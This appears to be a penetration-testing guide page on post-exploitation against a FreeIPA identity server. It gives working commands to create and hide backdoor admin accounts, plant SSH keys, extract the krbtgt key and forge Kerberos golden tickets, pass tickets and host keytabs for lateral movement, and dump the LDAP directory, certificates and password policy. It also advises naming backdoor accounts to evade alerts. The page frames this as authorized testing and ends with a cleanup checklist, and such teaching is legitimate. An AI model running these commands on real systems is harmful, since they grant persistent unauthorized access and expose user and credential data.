Post-Exploitation Techniques

Methods to maintain access, escalate privileges, and move laterally within a compromised FreeIPA environment.

Ethical Use Only

The techniques described on this page are intended for ethical penetration testing only. Always ensure you have proper authorization before testing any system.

Post-Exploitation Topics

Navigate through different post-exploitation techniques

Persistence

After gaining initial access to a FreeIPA environment, establishing persistence mechanisms ensures continued access even if the initial entry point is discovered and closed.

User Creation

Creating backdoor user accounts is a common persistence technique. In FreeIPA, this can be done using the IPA CLI or LDAP modifications.

Create a new user account using IPA CLI

ipa user-add backdoor --first=Back --last=Door --password

Add the backdoor user to the admins group

ipa group-add-member admins --users=backdoor

Security Consideration:

Creating admin users might trigger alerts. Consider using a less privileged account with specific privileges instead, or creating a user with a name that blends in with existing naming conventions.

SSH Key Backdoor

Adding SSH public keys to existing user accounts provides a stealthy way to maintain access without changing passwords.

Add an SSH public key to a user account

ipa user-mod victim --sshpubkey="ssh-rsa AAAA... backdoor@attacker"

Add SSH keys using LDAP

ldapmodify -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -f add_ssh_key.ldif

Example LDIF file for adding SSH keys:

dn: uid=victim,cn=users,cn=accounts,dc=example,dc=com changetype: modify add: ipaSshPubKey ipaSshPubKey: ssh-rsa AAAA... backdoor@attacker

Kerberos Golden Ticket

Creating a Kerberos golden ticket provides persistent access to the FreeIPA environment by forging a Ticket Granting Ticket (TGT).

Extract the krbtgt hash (requires admin access)

ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "uid=krbtgt,cn=users,cn=accounts,dc=example,dc=com" krbPrincipalKey

Create a golden ticket using Impacket

python ticketer.py -nthash <krbtgt_hash> -domain-sid <domain_sid> -domain <domain> administrator

Use the forged golden ticket

export KRB5CCNAME=./administrator.ccache

Diagram showing the process of creating and using a Kerberos golden ticket

Lateral Movement

Lateral movement involves using compromised credentials or systems to access other systems within the FreeIPA environment.

Pass-the-Ticket

The pass-the-ticket technique involves using captured Kerberos tickets to authenticate to other services without knowing the account password.

Import a captured ticket into the current session

export KRB5CCNAME=/path/to/ticket.ccache

Verify the imported ticket

klist

Use the ticket to access a service

ssh -o GSSAPIAuthentication=yes user@server.example.com

SSH Access via Host Keytabs

Host keytabs can be used to authenticate as the host principal, potentially leading to further access within the environment.

List principals in the host keytab (requires root access)

klist -k /etc/krb5.keytab

Authenticate using the host keytab

kinit -k -t /etc/krb5.keytab host/<hostname>

Use the host credentials to access other systems

ssh -o GSSAPIAuthentication=yes user@server.example.com

Lateral Movement Tip:

When moving laterally, look for hosts with trust relationships or shared service accounts. These can provide paths to access additional systems within the environment.

Data Exfiltration

Extracting valuable data from the FreeIPA environment can provide insights into the organization's structure, user accounts, and security posture.

LDAP Dumping

Extracting information from the LDAP directory can provide valuable data about users, groups, and access controls.

Dump the entire LDAP directory to a file

ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "dc=example,dc=com" -s sub "(objectClass=*)" > ldap_dump.ldif

Extract user information to a file

ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "cn=users,cn=accounts,dc=example,dc=com" "(&(objectClass=posixAccount)(!(nsAccountLock=TRUE)))" uid uidNumber > users.txt

Data Sensitivity Note:

LDAP dumps can contain sensitive information including user details, group memberships, and access control rules. Handle this data with care and in accordance with the rules of engagement for your penetration test.

Certificate Extraction

Extracting certificates and certificate authority information can provide insights into the organization's PKI and potentially be used for further attacks.

List all certificates in the FreeIPA CA

ipa cert-find --all

Export a specific certificate

ipa cert-show <serial_number> --out=cert.pem

Extract the CA certificate

curl -k https://<target_ip>/ipa/config/ca.crt > ca.crt

Password Policy Information

Extracting password policy information can reveal weaknesses in the organization's security posture.

Extract password policy information

ipa pwpolicy-show

Extract password policy information using LDAP

ldapsearch -x -h <target_ip> -D "uid=admin,cn=users,cn=accounts,dc=example,dc=com" -w password -b "cn=PWD Policies,cn=accounts,dc=example,dc=com" -s sub "(objectClass=*)"

Covering Tracks

After completing the penetration test, it's important to clean up any artifacts and ensure that the environment is returned to its original state.

Log Cleanup

FreeIPA logs various activities, including authentication attempts and administrative actions. Cleaning up these logs can help cover tracks.

View authentication logs

journalctl -u dirsrv@EXAMPLE.service

View IPA server logs

journalctl -u ipa.service

Ethical Consideration

In a real penetration test, you should document all activities rather than attempting to hide them. The goal is to help the organization improve their security, not to evade detection.

Removing Backdoors

Any persistence mechanisms or backdoors created during the penetration test should be removed to return the environment to its original state.

Remove a backdoor user

ipa user-del backdoor

Remove an SSH key from a user

ipa user-mod victim --sshpubkey=

Remove a user from a group

ipa group-remove-member admins --users=backdoor

Cleanup Checklist

Use this checklist to ensure that all artifacts from the penetration test are properly cleaned up.

Penetration Test Cleanup Checklist:

Remove any created user accounts
Remove any added SSH keys
Remove any modified group memberships
Delete any extracted data files
Remove any created certificates
Clear Kerberos tickets (kdestroy)
Document all cleanup actions in the penetration test report

Diagram showing the process of cleaning up after a penetration test